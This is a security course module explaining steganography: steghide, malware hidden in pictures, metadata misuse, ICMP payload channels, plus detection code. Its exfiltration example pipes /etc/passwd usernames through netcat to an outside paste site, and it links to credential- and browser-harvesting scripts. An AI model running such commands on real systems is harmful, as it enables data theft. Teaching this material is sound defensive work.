Module 5: Steganography

Tirocinante Consorzi

Created on September 13, 2023


Transcript

preface (1/2)

steganography

This module aims to provide a comprehensive introduction to the field of steganography, covering its use in

  • cyber attacks
  • data exfiltration
  • the manipulation of metadata
  • the manipulation of network traffic.

preface (2/2)

At the end of this module you will have reached the following goals:

  • You know the meaning of steganography
  • You know how steganography is used in cyber attacks
  • You know how steganography can be used for data exfiltration
  • You know how file metadata can be misused for steganography
  • You know how network traffic can be misused for steganography

What is steganography?

Steganography comes from Greek steganographia, which combines the words

  • steganós (στεγανός), meaning "covered or concealed",
  • and -graphia (γραφή) meaning "writing"
So steganography is the practice of concealing a message within another message or a physical object. Unlike encryption, which hides the content of a message but not the fact that one is being sent, steganography hides the existence of the message itself. In computing, a file, message, image or video is concealed within another file, message, image or video.

Example of steganography (1/8)

For a better understanding of steganography, we illustrate it with an example. We start from an image of the Minions (minion.jpeg), which will be used to conceal another file. We use a Linux machine and Linux tools in this example.

Example of steganography (2/8)

With the Linux command-line tool steghide you can hide data in JPEG, BMP, WAV and AU files. If you do not pass a passphrase with -p, steghide prompts for one, and the same passphrase is needed later to extract the data. On the manpage of steghide you can find the following options:

  • You should use the embed command if you want to embed secret data in a cover file. The following arguments can be used with the embed command:
  • -cf, --coverfile filename
Specify the cover file that will be used to embed data.
  • -ef, --embedfile filename
Specify the file that will be embedded (the file that contains the secret message).

Example of steganography (3/8)

Create the file you want to conceal, in this case hidden.txt, containing the secret message.

Example of steganography (4/8)

Embed the secret data (the contents of the text file) in the picture (which functions as the cover file) with steghide: “steghide embed -cf minion.jpeg -ef hidden.txt”. steghide asks for a passphrase (or takes it from -p) and writes the result into the cover file in place, so keep a copy of the original picture if you want to compare the two afterwards.

Example of steganography (5/8)

On Linux you can use the command file to determine the file type. If we check what type of file “minion.jpeg” is, an image is detected. The hidden text file is not detected, only the cover file: file reads just the magic bytes at the start of the file, and steghide embeds the data in the JPEG's compressed image coefficients rather than appending it, so the result is still a perfectly valid image.

Example of steganography (6/8)

But when we ask steghide for information about the file (“steghide info minion.jpeg”) and give the passphrase when prompted, we can see that there is an embedded file, with its name and size. Without the passphrase steghide only reports the format and capacity of the cover, so someone who does not know it has to fall back on statistical steganalysis or on brute-forcing the passphrase (tools such as stegseek do exactly that for steghide).

Example of steganography (7/8)

When the picture is sent to another device, the hidden.txt file can be extracted there. In the manpage of steghide you can find the following options:

  • If you have received a file that contains a message that has been embedded with steghide, use the extract command to extract it. The following arguments can be used with this command:
  • -sf, --stegofile filename
Specify the stego file (the file that contains embedded data).
  • -xf, --extractfile filename
Create a file with the name filename and write the data that is embedded in the stego file to it.

Example of steganography (8/8)

When the extraction is complete (“steghide extract -sf minion.jpeg -xf hidden.txt”, again with the passphrase), we can read the content of the text file with the command cat, and the secret message appears.
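To make concrete what "hiding inside the image data" means, here is an added example that is not part of the module and not steghide's own algorithm (steghide works on JPEG DCT coefficients and encrypts the payload): plain least-significant-bit embedding into raw 8-bit samples. The cover is a constructed byte buffer standing in for decoded pixel values, so it runs without an image library, and the last function shows why a file-type check cannot notice anything: no sample moves by more than one unit.

```python
"""
Least-significant-bit (LSB) steganography on raw 8-bit samples.

Added example, not from the original module and not steghide's algorithm.
The cover is a constructed byte buffer standing in for decoded pixel samples.
Layout of the hidden bit stream: 4-byte big-endian payload length, then payload,
one bit per sample, most significant bit of each byte first.
"""
import struct

HEADER = struct.Struct(">I")  # 4-byte big-endian payload length prefix


def capacity_bytes(cover: bytes) -> int:
    """How many payload bytes fit: one bit per sample, minus the length header."""
    return max(0, len(cover) // 8 - HEADER.size)


def embed(cover: bytes, payload: bytes) -> bytes:
    """Return a copy of `cover` whose sample LSBs carry len(payload) + payload."""
    if len(payload) > capacity_bytes(cover):
        raise ValueError(f"payload of {len(payload)} bytes exceeds capacity {capacity_bytes(cover)}")
    data = HEADER.pack(len(payload)) + payload
    stego = bytearray(cover)
    i = 0
    for byte in data:
        for shift in range(7, -1, -1):           # MSB first within each byte
            bit = (byte >> shift) & 1
            stego[i] = (stego[i] & 0xFE) | bit  # overwrite only the lowest bit
            i += 1
    return bytes(stego)


def extract(stego: bytes) -> bytes:
    """Read the LSBs back: first the 4-byte length, then that many payload bytes."""
    def read_bytes(offset_bits: int, n: int) -> bytes:
        out = bytearray()
        for k in range(n):
            val = 0
            for b in range(8):
                val = (val << 1) | (stego[offset_bits + k * 8 + b] & 1)
            out.append(val)
        return bytes(out)

    (length,) = HEADER.unpack(read_bytes(0, HEADER.size))
    if length > capacity_bytes(stego):
        raise ValueError("length header is implausible; no compatible payload present")
    return read_bytes(HEADER.size * 8, length)


def header_plausible(stego: bytes) -> bool:
    """Cheap sanity check: does the LSB length header fit in the buffer at all?"""
    try:
        extract(stego)
        return True
    except ValueError:
        return False


def max_sample_change(cover: bytes, stego: bytes) -> int:
    """Largest per-sample difference; LSB embedding never changes a sample by more than 1."""
    return max(abs(a - b) for a, b in zip(cover, stego))


if __name__ == "__main__":
    cover = bytes(range(256)) * 16                      # constructed 4096 "pixel" samples
    secret = b"this is the secret message of hidden.txt"
    stego = embed(cover, secret)
    print("capacity:", capacity_bytes(cover), "bytes")
    print("recovered:", extract(stego))
    print("max per-sample change:", max_sample_change(cover, stego))
```

The extraction routine rejects a buffer whose length header does not fit, which is the minimal check a receiver should do before trusting an embedded length; it is not a detector, since an untouched cover can by chance carry a small number in its LSBs.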

Introduction (steganography in cyber attacks)

As we saw when looking at the attacker landscape, many of an attacker's actions are automated with scripts. But how do you get those scripts onto a victim's computer without being noticed? One answer is steganography.

Using macros

Attackers have been embedding scripts in macro-enabled Excel and Word documents and use various pretexts to get the victim to enable the macros; the picture shows an example of such a lure. When the victim clicks “Enable content”, the macro runs the first step of the attack, typically downloading or dropping the next stage. Note that since 2022 Microsoft Office blocks macros by default in files downloaded from the internet (files carrying the Mark of the Web), so the lure nowadays also has to convince the victim to unblock the file.

Using pictures (1/4)

Attackers can also hide a script in a picture that people or programs download. Once the picture is on the victim's computer, the script can be triggered by another malicious program or by user interaction; opening the picture in an image viewer does nothing, because the viewer stops at the end of the image data. We illustrate this with an example.

Using pictures (2/4)

This picture is used in one of the largest and longest lasting Monero crypto jacking operations known to exist, namely WatchDog.

Using pictures (3/4)

After downloading, you can take a look at the content of the picture with a hex viewer or strings. First you see the data of the picture itself, but if you scroll to the end you see that not only image data is there: a script has been appended after it. A quick check for this pattern is to compare the offset of the image's end-of-image marker with the file size; anything after that marker is not part of the picture.

Using pictures (4/4)

If we check the file against reputation services such as VirusTotal (you can read more about reputation services in the topic about hashing), some security vendors flag the file as malicious.

Example of scripts (1/2)

Now we know that scripts can be delivered to a victim via steganography. But which scripts do attackers use? A good first step is snooping around: the reconnaissance phase. The attacker looks at the potential victim's system to see what is active on it and where there are weaknesses that can be exploited. The script shown is an example of a harvesting script (host and user enumeration) for a Windows environment.

Example of scripts (2/2)

If you search a little, you can find many scripts that can be used in this kind of recon phase; for every purpose there is a customized script. Examples:

  • Windows recon batch files:
    https://github.com/frizb/Windows-Privilege-Escalation/blob/master/windows_recon.bat
    https://github.com/jivoi/pentest/blob/master/post_win/recon.bat
  • Collect host and user details, network details, firewall details, enumerate the domain:
    https://github.com/BankSecurity/Red_Team/blob/master/Discovery/Host_Recon_Complete.bat
  • Harvest Chrome saved passwords:
    https://github.com/BankSecurity/Red_Team/blob/master/Credential_Access/Chrome_Passwords.txt
  • Get browser history:
    https://github.com/BankSecurity/Red_Team/blob/master/Discovery/Get_Browsers_History.txt

Introduction (data exfiltration)

Data exfiltration can happen in different ways and in different phases of an attack. Let us look at two examples. In the first we use an online tool to exfiltrate data; its purpose is to explain what data exfiltration is. The second is an incident in which steganography was actually used for exfiltration, so there the focus is on the steganography technique.

Example 1 (1/3)

In this example we use termbin.com, a command-line pastebin: you pipe text into a netcat connection to termbin.com on TCP port 9999 and get back a URL at which the text can be read by anyone who knows it. From an attacker's point of view that is a ready-made drop site that needs no infrastructure and only an outbound TCP connection.

Example 1 (2/3)

First, decide what you want to paste. Maybe you want to see which users exist on the Linux machine? Usernames are a nice first thing to know: a username is the first half of a set of credentials. Let's exfiltrate the usernames with termbin, for example by piping the first field of /etc/passwd into it (“cut -d: -f1 /etc/passwd | nc termbin.com 9999”).

Example 1 (3/3)

If you browse to the URL that termbin returns, you can indeed see all the usernames that exist on the local Linux machine. For a defender this is why outbound connections to paste services, and to unusual ports such as TCP 9999, are worth alerting on.

Example 2 (1/2)

In October 2016 Sucuri, a website security company, analysed an infected Magento webshop. The following file had been modified: app/code/core/Mage/Payment/Model/Method/Cc.php. Its content was edited and the following code was added.

Example 2 (2/2)

The attacker used an image file to hide the stolen credit card details on the website itself. This gives the attacker a storage location that looks like a harmless product image and can be collected later with a plain HTTP request. This was the image that contained the payment data:
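Both the WatchDog picture and this Magento image carry foreign data inside a file that still opens as a picture, and `file` cannot tell, because it only looks at the magic bytes at the start. The following added example (not from the module, and not Sucuri's or Unit 42's code) walks a JPEG's segment structure to the End-Of-Image marker and reports whatever follows it. The sample is a constructed JPEG skeleton with a harmless shell script appended, not either of the real images; whether the Magento image had the card data appended or embedded some other way is not stated above, but trailing data is the first thing to check.

```python
"""
Detect data appended after the end of a JPEG image.

Added example, not from the original module. A JPEG is a sequence of
marker segments; image data ends at the EOI marker (0xFFD9). Decoders and
`file` ignore anything after it, which is exactly where appended scripts or
exfiltrated data end up.
"""
import struct

SOI, EOI, SOS = 0xFFD8, 0xFFD9, 0xFFDA
# Markers without a length field: SOI, TEM and RST0..RST7
STANDALONE = {SOI, 0xFF01} | {0xFFD0 + i for i in range(8)}


def jpeg_end_offset(data: bytes) -> int:
    """Offset just past the EOI marker; raises ValueError if the structure is broken."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI marker")
    pos = 2
    while pos + 2 <= len(data):
        (marker,) = struct.unpack_from(">H", data, pos)
        if marker == EOI:
            return pos + 2
        if marker >> 8 != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}, got {marker:#06x}")
        if marker in STANDALONE:
            pos += 2
            continue
        if pos + 4 > len(data):
            break
        (length,) = struct.unpack_from(">H", data, pos + 2)  # length includes its own 2 bytes
        pos += 2 + length
        if marker == SOS:
            # Entropy-coded scan follows the SOS header: skip until a real marker,
            # i.e. 0xFF followed by something other than a stuffed 0x00 or RSTn.
            while pos + 1 < len(data):
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and not 0xD0 <= nxt <= 0xD7:
                    break
                pos += 1
    raise ValueError("no EOI marker found (truncated file)")


def trailing_data(data: bytes) -> bytes:
    """Bytes after the image proper; b'' for a clean file."""
    return data[jpeg_end_offset(data):]


def looks_like_script(blob: bytes) -> bool:
    """Cheap triage heuristic on the first bytes of the trailing blob."""
    head = blob.lstrip()[:64].lower()
    markers = (b"#!", b"<?php", b"powershell", b"cmd.exe", b"eval(", b"curl ", b"wget ")
    return any(head.startswith(m) or m in head for m in markers)


def report(data: bytes) -> dict:
    """Summary a triage script would log for one file."""
    end = jpeg_end_offset(data)
    trail = data[end:]
    return {"image_bytes": end, "file_bytes": len(data),
            "trailing_bytes": len(trail), "script_like": looks_like_script(trail)}


# Constructed minimal JPEG skeleton (SOI, APP0, SOS + a few scan bytes, EOI).
# It is not a decodable picture; it only exercises the marker walk.
JPEG_SKELETON = (
    b"\xff\xd8"                                                       # SOI
    b"\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"   # APP0, length 16
    b"\xff\xda\x00\x08\x01\x01\x00\x00\x3f\x00"                       # SOS, length 8, 1 component
    b"\x12\x34\xff\x00\x56\x78"                                       # scan data with a stuffed 0xFF00
    b"\xff\xd9"                                                       # EOI
)
# Constructed stand-in for an appended loader; deliberately harmless.
APPENDED_SCRIPT = b"#!/bin/sh\n# constructed sample, not real malware\necho hello\n"

if __name__ == "__main__":
    print("clean:   ", report(JPEG_SKELETON))
    print("appended:", report(JPEG_SKELETON + APPENDED_SCRIPT))
```

On a real file, read the bytes with `open(path, "rb").read()` and pass them to `report`; PNG needs the analogous walk to its IEND chunk, and a non-zero `trailing_bytes` is the signal regardless of whether the heuristic recognises the content as a script.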

What is metadata of a file?

Metadata is simply data about data: a description of, and context for, the data. The metadata of a document includes, among other things,

  • title and description
  • tags and categories
  • who created and when
  • who last modified and when
  • who can access or update
And every time you take a photo with today's cameras, a bunch of metadata is gathered and saved with it, such as:
  • date and time
  • filename
  • camera settings
  • geolocation

Misuse of metadata - Example (1/4)

Metadata of a file can contain very interesting and useful information, and attackers sometimes hide information in it as well. ExifTool is a command-line tool (it runs on Linux, macOS and Windows) that lets a user view and manipulate the metadata of images and many other file types. For example, “exiftool emoji.png” shows the metadata of a file called emoji.png:

Misuse of metadata - Example (2/4)

With ExifTool you can also edit the metadata of files. In the manpage we can see the following section:

  • -TAG[+-]=[VALUE]
Write a new value for the specified tag (eg. "-comment=wow"), or delete the tag if no VALUE is given (eg. "-comment="). "+=" and "-=" are used to add or remove existing entries from a list, or to shift date/time values (see Image::ExifTool::Shift.pl for details). "+=" may also be used to increment numerical values, and "-=" may be used to conditionally delete or replace a tag (see "WRITING EXAMPLES" for examples).

Misuse of metadata - Example (3/4)

Let's manipulate the metadata of the emoji.png file, for instance by writing a message into the Comment tag as in the manpage example (“exiftool -comment=... emoji.png”; ExifTool keeps a backup as emoji.png_original unless you pass -overwrite_original). Reading the metadata back shows the message in the Comment field, while the picture itself displays unchanged.

Misuse of metadata - Example (4/4)

Of course, this is easy to detect for anyone who looks at the metadata. But does an end user frequently look at metadata? In practice hardly anyone does, which is why stripping metadata at trust boundaries (“exiftool -all= file”, or re-encoding images on upload) is a cheap control, and why unusually long or encoded-looking Comment, Description or XMP fields are a useful triage signal for an analyst.
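Where does such a comment actually live? In a PNG, ExifTool stores it as a tEXt chunk with the keyword Comment. The following added example (not from the module and not ExifTool's code) builds that structure by hand and then lists every text chunk, so you can see the metadata that `file` never shows; it also flags oversized text fields, the triage cue mentioned above. A constructed 1x1 PNG stands in for emoji.png so the script runs offline.

```python
"""
Write and read PNG text chunks (what `exiftool -comment=...` does on a PNG).

Added example, not from the original module. PNG = 8-byte signature followed
by chunks: 4-byte length, 4-byte type, data, 4-byte CRC32 over type + data.
Text metadata sits in tEXt chunks whose data is keyword NUL text (Latin-1).
"""
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def _chunk(ctype: bytes, body: bytes) -> bytes:
    """Serialise one chunk with its CRC."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def iter_chunks(png: bytes):
    """Yield (type, data, crc_ok) for each chunk; stops after IEND."""
    if not png.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos = len(PNG_SIG)
    while pos + 8 <= len(png):
        (length,) = struct.unpack_from(">I", png, pos)
        ctype = png[pos + 4:pos + 8]
        body = png[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack_from(">I", png, pos + 8 + length)
        yield ctype, body, crc == (zlib.crc32(ctype + body) & 0xFFFFFFFF)
        pos += 12 + length
        if ctype == b"IEND":
            return


def minimal_png() -> bytes:
    """Constructed 1x1 greyscale PNG: IHDR, one zlib-compressed scanline, IEND."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)  # 1x1, 8-bit depth, colour type 0
    idat = zlib.compress(b"\x00\x80")                     # filter byte 0 + one grey pixel
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")


def add_text(png: bytes, keyword: str, text: str) -> bytes:
    """Rebuild the file with a tEXt chunk inserted just before IEND."""
    body = keyword.encode("latin-1") + b"\x00" + text.encode("latin-1")
    out = PNG_SIG
    for ctype, data, _ in iter_chunks(png):
        if ctype == b"IEND":
            out += _chunk(b"tEXt", body)
        out += _chunk(ctype, data)
    return out


def text_chunks(png: bytes) -> list:
    """All tEXt entries as (keyword, text); chunks with a bad CRC are skipped."""
    out = []
    for ctype, body, ok in iter_chunks(png):
        if ctype == b"tEXt" and ok:
            key, _, val = body.partition(b"\x00")
            out.append((key.decode("latin-1"), val.decode("latin-1")))
    return out


def oversized_text(png: bytes, limit: int = 200) -> list:
    """Keywords whose text exceeds `limit` bytes: a crude cue for payload-carrying comments."""
    return [k for k, v in text_chunks(png) if len(v) > limit]


if __name__ == "__main__":
    stego = add_text(minimal_png(), "Comment", "meet at 22:00")
    print("chunks:", [c for c, _, _ in iter_chunks(stego)])
    print("text:  ", text_chunks(stego))
    print("oversized:", oversized_text(add_text(minimal_png(), "Comment", "A" * 300)))
```

Run `text_chunks(open("emoji.png", "rb").read())` on the real file to list its tEXt entries; compressed zTXt and international iTXt chunks hold text too and would need their own decoding, and EXIF-style metadata lives in an eXIf chunk instead.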

Introduction (steganography in network traffic)

Steganography in network traffic is the practice of embedding information inside the protocols used for data transfer, such as TCP, UDP or ICMP. Header fields, padding, payload filler and timing of practically any protocol, from the physical layer up to the application layer, can be misused this way. We make it concrete with an example of a message carried in ICMP echo requests, the basic idea behind an ICMP tunnel.

ICMP tunnel (1/4)

If we “ping” a destination, we can capture the packets with Wireshark. Each ICMP echo request carries a data field (56 bytes by default on Linux) whose content is mostly filler: ping uses the first bytes for a timestamp and pads the rest with a fixed pattern so the packet reaches its configured size.

ICMP tunnel (2/4)

On a Linux system, the manpage of ping says the following:

  • -p pattern
You may specify up to 16 "pad" bytes to fill out the packet you send. This is useful for diagnosing data-dependent problems in a network. For example, -p ff will cause the sent packet to be filled with all ones.

ICMP tunnel (3/4)

“Hello World” in hexadecimal is “48 65 6C 6C 6F 20 57 6F 72 6C 64”: eleven bytes, within the 16-byte limit of -p. We use this pattern in our ping command, written as one string of hex digits without spaces: “ping -p 48656C6C6F20576F726C64 <destination>”.

ICMP tunnel (4/4)

When you look at the capture of this ping, you can see our secret message “Hello World” repeated inside the data field of every ICMP echo request: we are carrying data in a protocol that is normally just a reachability check. Note that this toy channel is not hidden from anyone who reads the packet bytes. Real ICMP tunnelling tools put arbitrary (often encrypted) data in the same field, and a defender spots them by comparing the payload with the fixed pattern a normal ping uses, by unusual payload sizes, and by the volume of echo requests.
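To see exactly which bytes Wireshark would show, here is an added example (not from the module) that builds the ICMP echo request “ping -p 48656C6C6F20576F726C64” would send, parses it back, recovers the repeated pattern and flags the payload as non-default. It sends nothing. The default fill it compares against (a 16-byte timestamp, then bytes 0x10, 0x11, ... up to 0x37) is what iputils ping produces on 64-bit Linux; treat that as an assumption to verify against your own captures, since other ping implementations use other filler.

```python
"""
Build and inspect an ICMP echo request whose data field carries a pattern,
the way `ping -p <hex>` does. Added example, not from the original module;
nothing is transmitted. Assumption: the "default fill" below matches iputils
ping on 64-bit Linux (16-byte timestamp, then counting bytes from 0x10).
"""
import struct

ICMP_ECHO_REQUEST = 8
DEFAULT_DATA_LEN = 56   # ping's default data size on Linux (64 bytes with the ICMP header)
TIMESTAMP_LEN = 16      # assumed size of the timestamp ping stores at the start of the data


def checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum over 16-bit words, as used by ICMP."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def ping_payload(pattern: bytes, timestamp: bytes = b"\x00" * TIMESTAMP_LEN,
                 length: int = DEFAULT_DATA_LEN) -> bytes:
    """Timestamp first, then the -p pattern repeated to fill the data field."""
    if not 1 <= len(pattern) <= 16:
        raise ValueError("ping -p accepts 1 to 16 pattern bytes")
    fill = length - len(timestamp)
    body = (pattern * (fill // len(pattern) + 1))[:fill]
    return timestamp + body


def build_echo(ident: int, seq: int, payload: bytes) -> bytes:
    """ICMP header (type, code, checksum, id, seq) + payload, checksum filled in."""
    hdr = struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, 0, ident, seq)
    csum = checksum(hdr + payload)
    return struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, csum, ident, seq) + payload


def parse_echo(packet: bytes) -> dict:
    """Split an ICMP packet into its fields; checksum over the whole packet must be 0."""
    icmp_type, code, csum, ident, seq = struct.unpack("!BBHHH", packet[:8])
    return {"type": icmp_type, "code": code, "id": ident, "seq": seq,
            "payload": packet[8:], "checksum_ok": checksum(packet) == 0}


def default_linux_fill(length: int = DEFAULT_DATA_LEN, ts_len: int = TIMESTAMP_LEN) -> bytes:
    """Assumed iputils default: data byte i (for i >= ts_len) equals i."""
    return bytes(range(ts_len, length))


def nondefault_payload(payload: bytes, ts_len: int = TIMESTAMP_LEN) -> bool:
    """True when the bytes after the timestamp are not ping's counting pattern."""
    return payload[ts_len:] != default_linux_fill(len(payload), ts_len)


def recover_pattern(payload: bytes, ts_len: int = TIMESTAMP_LEN) -> bytes:
    """Shortest repeating unit of the fill area: what the sender passed to -p."""
    body = payload[ts_len:]
    for n in range(1, len(body) + 1):
        if (body[:n] * (len(body) // n + 1))[:len(body)] == body:
            return body[:n]
    return body


if __name__ == "__main__":
    secret = bytes.fromhex("48656C6C6F20576F726C64")          # "Hello World"
    pkt = build_echo(0x1234, 1, ping_payload(secret))
    fields = parse_echo(pkt)
    print("data field:", fields["payload"].hex(" "))
    print("checksum ok:", fields["checksum_ok"])
    print("non-default payload:", nondefault_payload(fields["payload"]))
    print("recovered -p pattern:", recover_pattern(fields["payload"]))
```

The data field printed here is what you see in Wireshark's ICMP Data bytes; `nondefault_payload` is the check a detection rule would apply to every echo request, and `recover_pattern` is what an analyst does by hand when the filler turns out to be text.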

conclusion

Steganography is used a lot for malicious purposes, and the different techniques above all turn up in real cyber attacks. Below are some real-world examples (article titles):

  • Cybereason Exposes Campaign Targeting US Taxpayers with NetWire and Remcos Malware
  • Cybercriminals are using steganography to hide their code and seek industrial data
  • Web skimmer hides within EXIF metadata, exfiltrates credit cards via image files
  • Threats Making WAVs – Incident Response to a Cryptomining Attack